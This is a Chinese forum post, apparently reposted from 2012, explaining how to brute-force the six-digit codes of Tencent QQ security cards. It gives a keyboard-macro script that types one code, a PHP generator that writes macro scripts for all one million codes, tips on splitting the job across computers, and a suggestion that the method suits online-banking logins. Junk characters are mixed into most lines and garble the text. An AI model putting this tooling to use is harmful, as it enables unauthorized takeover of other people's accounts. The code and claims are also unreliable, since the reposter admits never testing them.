|
|
密保卡的设置挺复杂,采用A-J的纵坐标 与 1-8的模坐标中,放着两位任意的数字。而QQ登录的时候,是采用这样的三组组合。如果我们尝试由这些坐标点中的数字去发现规律,几乎是不可能的,我想这种思路也是导致许多想破解的人,立马放弃的原因。 首先来手工来登录,密保卡试一下,我们可以发现,实际上我们在破解这个密码过程中,可以完全忽略那三组的坐标组合,我们可以认真看到,密保卡,真正来讲只是要求6这个数字(0-9)。这样子,那我们的暴力破解就可以换一种思路了,那就是我们尝试用6个数字的暴力去跑那些密码框就行了。而且腾讯这个密保卡,没有限制尝试登录的次数。正好可以用来跑暴力的。分析的结果,就是这个密保卡的密码,我们只要让密码在这个区间“0 – 0 - 0 – 0 – 0 - 0 ====> 9-9-9-9-9-9”进行暴力输入验证就可以了。 现在已经锁定了,暴力破解的方案,那要采用什么工具呢?有想祭起delphi,搞一个窗口句柄跟踪,然后对这几个窗口进行,暴力破解的。只不过最近一直在用FreeBSD与C,对于Windows平台上面的编程真的一点兴趣都没有了? 想到的思路就是采用“按键精灵”软件,我们先手工录制一个“000000”的按键脚本,然后再用其他程序,写一个0-1000000的循环,将这里面的“000000”的值由“000000”到“999999”区间来代替,这样子就可以利用按键精灵的这个脚本来进行暴力的破解。下面发布一个按键精灵的脚本。
4 m$ H/ O k3 [. U: q" V
7 O4 b- R! ?# C5 A( }+ ?1 R7 q% x) O' B" [' f
下面是“000000”的按键脚本
* ~, Q( |& ~) B8 @( |, p* fMoveTo 817 320
$ }" M- ?) V, I/ C8 @# r% eMoveTo 817 318; { x2 [/ P6 j
MoveTo 815 317/ w& {5 A& s2 M4 I/ Y
MoveTo 811 315
4 K4 n4 F) T6 }/ XMoveTo 807 312
6 @! J" p5 _0 tMoveTo 803 3095 T2 G9 P5 [ Q6 ?- Y, D$ u
MoveTo 801 307
, Q& ~) ^: g! L: x* nMoveTo 799 305
B) _0 i7 t& c0 ?& n, o! \! `, vMoveTo 797 302
/ q2 F/ i+ M$ [$ a7 w- g1 N2 |MoveTo 796 300
1 O8 M, J4 |6 m: C8 k0 E/ IMoveTo 793 296' y6 p9 D; ^' q0 O6 b( X H
MoveTo 791 2944 p2 A# Z6 W( e6 R
MoveTo 788 291
8 e8 J& e, V. @- gMoveTo 785 289
/ n8 d& }; Y& pMoveTo 783 287; l6 z9 {& u/ C1 _8 g: M, @
MoveTo 779 285
|5 ]: w/ i# M7 ]MoveTo 749 2431 \3 X8 \% F; t. j: [
LeftClick 1
% y6 o0 v$ s$ g2 ]( ]Delay 2063
2 m4 R( `6 ~" o8 x* J3 M* SKeyDown 48 1 这是第一位密码的按下- a' n" h1 b4 N0 `) Z3 _5 P
Delay 78
* [$ _0 j3 L% fKeyUp 48 1 这是第一位密码的弹起
/ K% |- z- l6 B/ q; }- qDelay 172$ l: S" M9 T9 H4 E5 B; v4 B
KeyDown 48 1 这是第二位密码的按下
4 R9 D" p- i2 T- M9 @Delay 78" K3 C' F9 A9 H4 E
KeyUp 48 1 这是第二位密码的弹起) U$ e* m( `" ?; E6 v# v
Delay 484
* }2 E) q" Y: p! lKeyDown 48 1 这是第三位密码的按下
/ k8 i" I" ^' r9 |# |, A2 R8 B; MDelay 63, g4 k W: |/ G+ ^) O; k
KeyUp 48 1 这是第三位密码的弹起) E: w+ z8 W; O$ e) q. ?/ @6 [( Q4 ]
Delay 156. V% U% K( v% O, V& P8 ?8 M. o6 M
KeyDown 48 1 这是第四位密码的按下7 m% C }& O' ?9 h
Delay 94' o/ I/ g4 @' M6 z
KeyUp 48 1 这是第四位密码的弹起
$ y' N2 F7 j, @- |( L3 G0 u9 SDelay 687' d. @4 J% f5 k
KeyDown 48 1 这是第五位密码的按下) G/ n* y7 r8 o4 z
Delay 78- q# @9 R$ s" j
KeyUp 48 1 这是第五位密码的弹起" N8 { A5 o1 ~% M: e
Delay 9850 C5 X; m" O2 s$ D+ J( W
KeyDown 48 1 这是第六位密码的按下
+ a/ p; G; c; {Delay 93 3 Z. { Z! W/ U5 u1 o Z
KeyUp 48 1 这是第六位密码的弹起
; x! Z' W# v. @4 }+ J4 SMoveTo 952 286
2 Z' _' c0 u& S+ u% `/ oMoveTo 966 2871 U7 Q0 O2 s1 b
MoveTo 980 289
( Y0 F- v. W0 k7 i9 b& f% uMoveTo 986 291
# q6 C X) F& ^/ {3 ~& @MoveTo 990 292
- i. Q& ^/ B. q# k4 q9 u8 [MoveTo 994 292
7 U0 o, t" }! F9 b* cMoveTo 996 292; ^. v' V; g9 @3 O
MoveTo 997 2922 x% T0 y. r, Z' S' A. }
MoveTo 998 292
7 G8 r1 } o; g3 }4 @MoveTo 999 293
3 h: B; }3 \( ^7 WMoveTo 999 294
* [) P. B! p( I9 {4 \9 rMoveTo 945 309
/ V2 f0 O6 y0 B3 z! {MoveTo 943 309
3 v. n6 a0 G/ Y3 E$ MMoveTo 915 306! Z6 a) Z: h/ e( [5 O
Delay 1063
" y* a- Z1 w& jLeftClick 1
( l4 Q3 c, d2 N0 sDelay 2657) G+ ]. @0 c2 |1 `( [
LeftClick 1+ k2 B3 |, I4 L" \$ P7 l
MoveTo 871 294: r d) h+ x/ ^, @- M6 C
MoveTo 867 293$ |' P# Z# r/ W m+ d2 j' T
MoveTo 862 291
1 |. o& g$ R- _/ zMoveTo 857 289
8 t+ [3 w) n& o& p! k8 m4 }, _MoveTo 853 2884 @. n [# {7 G" k- h- R) v9 ~
MoveTo 849 2872 X, v/ i7 T" Q6 c4 L! I& }
MoveTo 844 284+ i( p& {; c/ K' v( Q" x
MoveTo 744 244
' S; i u1 V0 p. h2 }( BDelay 4641# n# R8 w7 y6 S/ `
LeftClick 1$ o1 T: i% o/ V' y. D
MoveTo 612 2619 t4 D3 u. r7 W2 u, j
' a8 w7 D: q+ V" d4 |) g
CrackQQ.php这个是用来生成暴力破解脚本的php代码5 e Y$ A; S2 Z. t* k
<?php; H! J! o# w3 Q% P
set_time_limit(0);; ^" [& P) B4 V2 C& j1 }% ~, w
$myfile = fopen('QQCrack.txt','w+');9 Q/ a- n; @# ~! b/ _0 v) P! |2 k
for($pwd=0;$pwd<1000000;$pwd++)
% r# m2 k7 O, T$ N) l% y0 n0 m{7 G) ~2 u* i. \( q% ] F
if($pwd<=9)
3 C B& A6 q& u4 h {
6 `- d( |0 E Q$pwd_1 = $pwd;% B7 E1 x2 D1 _ E( M
$pwd_2 = 0;
" c( _" v, v; G1 j; `6 ?3 p, F1 G$pwd_3 = 0;; l; H/ x* q: @' _$ y6 d5 {' v& k+ d
$pwd_4 = 0;) B( m: b) T* V% H% l
$pwd_5 = 0;
- _8 Z: n' P* ]+ a% X( ^9 F$pwd_6 = 0;7 E" P6 M' a' j$ @
}* f% Z0 ^: [" M5 l* l
if($pwd>9 && $pwd<=99)! f$ w7 ]1 u* _( s4 O- }. F
{
1 Y; M' i! y4 _) N8 G3 ^9 P6 v$pwd_1 = substr($pwd,1,1);
( j" |& e1 e p' l8 R# G( \; k; F# ? $pwd_2 = substr($pwd,0,1);
, u9 ^3 m, p, y6 W1 u# P$pwd_3 = 0;
$ X* X) b+ w7 i D$pwd_4 = 0;) W% [" W: o5 g& c; ?' x. _
$pwd_5 = 0;
$ s! l. I& P/ H7 |0 h& P3 d$pwd_6 = 0;
1 c" B3 s9 O2 ?, F3 j }& [; w5 S4 c- g7 V! S
if($pwd>99 && $pwd<=999)
8 a5 Y3 B3 n' w' k {0 ~6 R' z# g( X- }
$pwd_1 = substr($pwd,2,1);
$ T( P7 J5 Z% q( }; P $pwd_2 = substr($pwd,1,1);( Z% Q- I& u4 O* R0 Q. S* _9 s# J
$pwd_3 = substr($pwd,0,1);
q- m% q% L3 _3 W$pwd_4 = 0;3 W9 L! U; }2 Z: H ~$ q
$pwd_5 = 0;
e& s$ e1 b/ Y) B1 ]6 `$pwd_6 = 0;% X; V3 @9 ~: o, h' o) [4 p
}4 c; y3 q6 W" X9 a, H, l# m% g; _
if($pwd>999 && $pwd<=9999)( z) h* ?4 N# v; ?! x# | R
{
9 u# q6 z& n! l# g3 E9 E: E8 \$pwd_1 = substr($pwd,3,1);
# b: y- M' n/ Q d6 k $pwd_2 = substr($pwd,2,1);/ L! p% h5 Y2 x( I% }. D
$pwd_3 = substr($pwd,1,1);
, h' R6 y& w0 p7 e* Z$pwd_4 = substr($pwd,0,1);
9 I- n+ S. G3 J* v+ i( w$ c% P. L9 K$pwd_5 = 0;) n- v8 ]6 w" W# y
$pwd_6 = 0;
# p, j# p6 C7 C4 b0 N }
: Y/ _, b% m, }( u) m% ? if($pwd>9999 && $pwd<=99999)
6 V9 g. T2 n# g; x- T {1 F& d) @3 o: Z5 K
$pwd_1 = substr($pwd,4,1);
% u9 V' Y" d B! D $pwd_2 = substr($pwd,3,1);
: Z: X- A$ M! P% V: N$pwd_3 = substr($pwd,2,1);3 R8 m5 d7 V) s0 e G; l% r
$pwd_4 = substr($pwd,1,1);! T8 T* R, s& N6 N1 d; O
$pwd_5 = substr($pwd,0,1);
5 z# V7 S9 A L" t/ S% y6 g$pwd_6 = 0;
! q T( Z8 U% l& v- U) W/ | }
9 Q6 X0 u1 L6 b/ I if($pwd>99999 && $pwd<=999999)' O& @0 I0 u5 Q! {4 O( @( Q
{
: N1 x( H3 K* e V" p5 E8 D# Q$pwd_1 = substr($pwd,5,1);
$ [" x9 v" \ w5 L9 i $pwd_2 = substr($pwd,4,1);
, a. W, n# I- G$ M! H$pwd_3 = substr($pwd,3,1);
" q! g( A/ J6 @" x& @) A$pwd_4 = substr($pwd,2,1);% {& `! e5 D8 e4 C9 l4 E
$pwd_5 = substr($pwd,1,1);
, E9 }/ h8 g( T# o$pwd_6 = substr($pwd,0,1);
7 r) c5 C% A& Q* V8 _ }
8 T4 B( X2 @ Y- B) F" P+ o. {3 S; b. {# r- `# Z7 u# Y4 ?& q
//echo $pwd_6,"-",$pwd_5,"-",$pwd_4,"-",$pwd_3,"-",$pwd_2,"-",$pwd_1,"<br>";
3 {" I( O' [. r# ] //echo ord($pwd_6),"-",ord($pwd_5),"-",ord($pwd_4),"-",ord($pwd_3),"-",ord($pwd_2),"-",ord($pwd_1),"<br>";: h. @: D4 \9 P( c' L0 i, c; T( H
+ {* r: J" \: p: U $ord_pwd_1 = ord($pwd_1);1 t! x0 ~0 \% d5 Z
$ord_pwd_2 = ord($pwd_2);
: w! \5 m$ u3 N. u9 m- i1 Q+ T: q $ord_pwd_3 = ord($pwd_3);( r9 E; g$ H9 U1 y# x" y* |1 R& f
$ord_pwd_4 = ord($pwd_4);
4 w: G) Q# c" |! ^1 R: F $ord_pwd_5 = ord($pwd_5);
* ^ q i4 d* I $ord_pwd_6 = ord($pwd_6);
* }4 t) n- z- u1 a: O+ v' a; N
+ ~% U. O3 N2 z* X fwrite($myfile,"MoveTo 817 320\n");* ^3 v- O+ t4 Z+ H: a
fwrite($myfile,"MoveTo 817 318\n");# _4 _$ L& r- ?
fwrite($myfile,"MoveTo 815 317\n");& f* a0 i4 w% N, C9 b! E4 u
fwrite($myfile,"MoveTo 811 315\n");3 R5 i6 E, c9 |; a+ \" g
fwrite($myfile,"MoveTo 807 312\n");7 M. u- q! F$ O' Z
fwrite($myfile,"MoveTo 803 309\n");8 d; P: n6 X* N
fwrite($myfile,"MoveTo 801 307\n");- w5 n& W8 b1 x9 C6 c
fwrite($myfile,"MoveTo 799 305\n");
' t4 j \5 S& u$ y& O, ? fwrite($myfile,"MoveTo 797 302\n");
7 [: k; x- J; E ]6 B8 A j* N+ j fwrite($myfile,"MoveTo 796 300\n");7 \8 e- ? ^+ h
fwrite($myfile,"MoveTo 793 296\n");
4 w9 {! A& E' }$ d6 D3 b8 E fwrite($myfile,"MoveTo 791 294\n");; |0 d6 I& P8 [
fwrite($myfile,"MoveTo 788 291\n");
$ X F& o1 y& M4 p& R fwrite($myfile,"MoveTo 785 289\n");3 D/ {3 }6 f4 ^" S- ~
fwrite($myfile,"MoveTo 783 287\n");
! `3 \/ M& b( T6 ]3 D1 P$ b& ]: p$ V fwrite($myfile,"MoveTo 779 285\n");
- g( [5 y5 V! w6 a fwrite($myfile,"MoveTo 749 243\n");+ U/ J T3 D" c" Q8 e
fwrite($myfile,"LeftClick 1\n");$ h# q1 w! N) J. k' t& U' K% k* W1 |0 t
fwrite($myfile,"Delay 2063\n");
% N* u Y3 _( G* @* J* X- J6 y fwrite($myfile,"KeyDown $ord_pwd_6 1\n"); //第一位密码按下" x8 D- C+ }& ~7 n4 X* H$ L
fwrite($myfile,"Delay 78\n");- M! ~1 `, e4 n
fwrite($myfile,"KeyUp $ord_pwd_6 1\n"); //第一位密码弹起
' k. @6 O% g. J% { fwrite($myfile,"Delay 172\n");
8 \8 z: ?+ T' o+ x1 C fwrite($myfile,"KeyDown $ord_pwd_5 1\n"); //第二位密码按下
, E; q" D7 g3 P, a8 G; Y4 x fwrite($myfile,"Delay 78\n");
3 h& b, K" A" z$ p2 c6 m fwrite($myfile,"KeyUp $ord_pwd_5 1\n"); //第二位密码弹起0 {* s) L- K2 {0 e
fwrite($myfile,"Delay 484\n");
( x/ o4 j& G+ x( V, j fwrite($myfile,"KeyDown $ord_pwd_4 1\n"); //第三位密码按下
1 w4 N" D* U4 B- ^- [ fwrite($myfile,"Delay 63\n");
( r8 {; Z5 [7 X$ M7 ~% s) l! ]2 X0 \ fwrite($myfile,"KeyUp $ord_pwd_4 1\n"); //第三位密码弹起
( L2 I0 G2 }, c$ O. W/ s4 ` fwrite($myfile,"Delay 156\n");3 M6 D/ f. v k
fwrite($myfile,"KeyDown $ord_pwd_3 1\n"); //第四位密码按下& i- w4 i3 I5 i
fwrite($myfile,"Delay 94\n");2 E: A* U, I. ^# {
fwrite($myfile,"KeyUp $ord_pwd_3 1\n"); //第四位密码弹起
# j9 \$ m9 G( ?8 A, ^! { fwrite($myfile,"Delay 687\n");" K3 y ^: R9 V4 c( q5 l
fwrite($myfile,"KeyDown $ord_pwd_2 1\n"); //第五位密码按下0 W9 H* [0 m$ \6 ^2 \6 [) Y
fwrite($myfile,"Delay 78\n");2 z0 m8 G+ A' G! A. D" A) m
fwrite($myfile,"KeyUp $ord_pwd_2 1\n"); //第五位密码弹起
5 p" }: d, p5 D0 b" o fwrite($myfile,"Delay 985\n");
/ O( p( T- A8 ?% H& X, o' v fwrite($myfile,"KeyDown $ord_pwd_1 1\n"); //第六位密码按下. ^ W7 s0 }7 F. ^9 i% ^
fwrite($myfile,"Delay 93\n");0 h2 d" t. I: w( h2 Z5 X
fwrite($myfile,"KeyUp $ord_pwd_1 1\n"); //第六位密码弹起; Q F. ~" f0 @
fwrite($myfile,"MoveTo 952 286\n");
4 n: I9 g0 F1 F( h2 W fwrite($myfile,"MoveTo 966 287\n");( |; [! r4 t0 r* g2 \- ^5 s4 W( ~- Q
fwrite($myfile,"MoveTo 980 289\n");& m9 R* X3 B) f' d
fwrite($myfile,"MoveTo 986 291\n");6 E1 D4 p" Q. A J/ Q0 ]( c
fwrite($myfile,"MoveTo 990 292\n");
9 ]4 m0 w6 I" I/ [* `3 T fwrite($myfile,"MoveTo 994 292\n");$ v1 h$ k4 f6 T) M/ v4 A/ c' E8 i8 s
fwrite($myfile,"MoveTo 996 292\n");
# `+ r9 O9 b3 N3 g; w: e& n fwrite($myfile,"MoveTo 997 292\n");
. a- e( N3 K. I2 F2 u4 u fwrite($myfile,"MoveTo 998 292\n");
$ s. I. l/ h. d fwrite($myfile,"MoveTo 999 293\n");
; e( j( Q; V0 r- n fwrite($myfile,"MoveTo 999 294\n");
' m( A: a" k: H/ \& M) \% Y+ g fwrite($myfile,"MoveTo 945 309\n");: k% `" D+ a' F
fwrite($myfile,"MoveTo 943 309\n");5 e# G" ^: Q/ A. A8 I d
fwrite($myfile,"MoveTo 915 306\n");
]6 j! |* X% M t, X$ R fwrite($myfile,"Delay 1063\n");
! y& g: {7 X" v' [ fwrite($myfile,"LeftClick 1\n");. F/ \3 O( u/ T8 g3 J
fwrite($myfile,"Delay 2657\n");# U. a4 n- X: W! A+ \; @/ J9 T
fwrite($myfile,"LeftClick 1\n");1 c7 n% H% L' V: J% n0 }
fwrite($myfile,"MoveTo 871 294\n");
, l6 ]6 z8 b* B8 t. A* w. i) T; e fwrite($myfile,"MoveTo 867 293\n");
$ _0 C- V$ j0 n2 E' ? fwrite($myfile,"MoveTo 862 291\n");+ C% R5 i" Z' V
fwrite($myfile,"MoveTo 857 289\n");
% _) J' _' G& W- T T fwrite($myfile,"MoveTo 853 288\n");3 }# h& c/ r: v8 |1 Z3 F
fwrite($myfile,"MoveTo 849 287\n");
' A0 j7 v9 F; ?9 q. l+ I2 d' D fwrite($myfile,"MoveTo 844 284\n");
, [* {0 }- U/ d fwrite($myfile,"MoveTo 744 244\n");: k1 q, `& ]- o0 F5 B8 c/ Z6 y* f# P! l
fwrite($myfile,"Delay 4641\n");/ D+ v: b8 n `! h# C' b/ m
fwrite($myfile,"LeftClick 1\n");
8 k g0 D. F7 V( d fwrite($myfile,"MoveTo 612 261\n");
( y) i0 Y/ l9 s$ i3 d}3 a- i! F3 w" j. G
fclose($myfile);
/ h; s n& t5 k2 s?>1 l1 N1 K- a; \2 y
注意,这个脚本生成暴力破解脚本QQCrack.txt达到900M左右了,这样子我们只要将这个脚本拷贝到按键精灵的目录下就可以了调用。现在唯一担心的就是按键精灵,是否直接这么多行的脚本了。$ a. [4 a9 J3 T6 T
( u% m* I) l" h4 |4. 严重的情况发生了,生成的这个暴力脚本太大了,连EditPlus打开都出错了,看来按键精灵也必须会出错的。甚至用Word打开,也只能支持32M大小的文件。看来不能一下子生成的暴力破解文件。那只能限制数据的范围来生成不同段的暴力文件了。就是可以将CrackQQ.php文件中的“for($pwd=0;$pwd<1000000;$pwd++)”这个代码的范围,修改成
Y* K0 z5 d' [" F1 \( Q# P* `/ u* `“for($pwd=0;$pwd<10000;$pwd++)”这样子的一个个段,分段生成不同的暴力文件,然后再将这些分段的暴力的文件,拷贝到不同的计算机上面,进行分段的暴力输入与暴力破解的。
& W! W5 i9 c: ^4 p1 C7 }在这个生成暴力破解的文件过程中,建议采用FireFox浏览器来读取php代码,本人是将这个php脚本拷贝到FreeBSD下面,然后打开FireFox浏览器来读取php的。
; F" k# h9 [$ l8 j8 C8 O! n2 F
; |7 A! i. K& ]2 K0 P& v
0 h3 a& Z" Y: j6 w: v5 L5. 生成10000次的暴力破解的文件,竟然需要9M的大小。如果这样子大小,按最早生成的900M,就需要将暴力破解的文件,分成100批进行暴力文件生成与分批运算破解的。虽然这个过程麻烦,不过总算是完全实现了暴力破解的全过程。
, t, S" j; Z3 P% a7 ^+ m" E
- d' F& |6 r( M" k当然采用这种方法,实际上也可以用来对某些在线银行的密码登录暴力破解提供参考思路的.
& i% ~, Z* ~) M e9 m# O0 o6 k1 w7 M/ U S/ v; E
PS:本文为转载自 智导网络 作者:林峰; F, n: M" t n# o0 } K5 \
F! V' T; o$ I4 |$ s8 g- ]/ J: q" T. y2 N9 J
本人未曾测试过该脚本是否有效,但是这种方法可以为各位提供密保卡的破解思路! |
# J: ]- u% Q+ ` h6 }
|
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2012-6-17 23:50:38
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡
发表于 2012-6-17 23:58:19
这个确实有点暴力。。而且密保卡现在用的人很少吧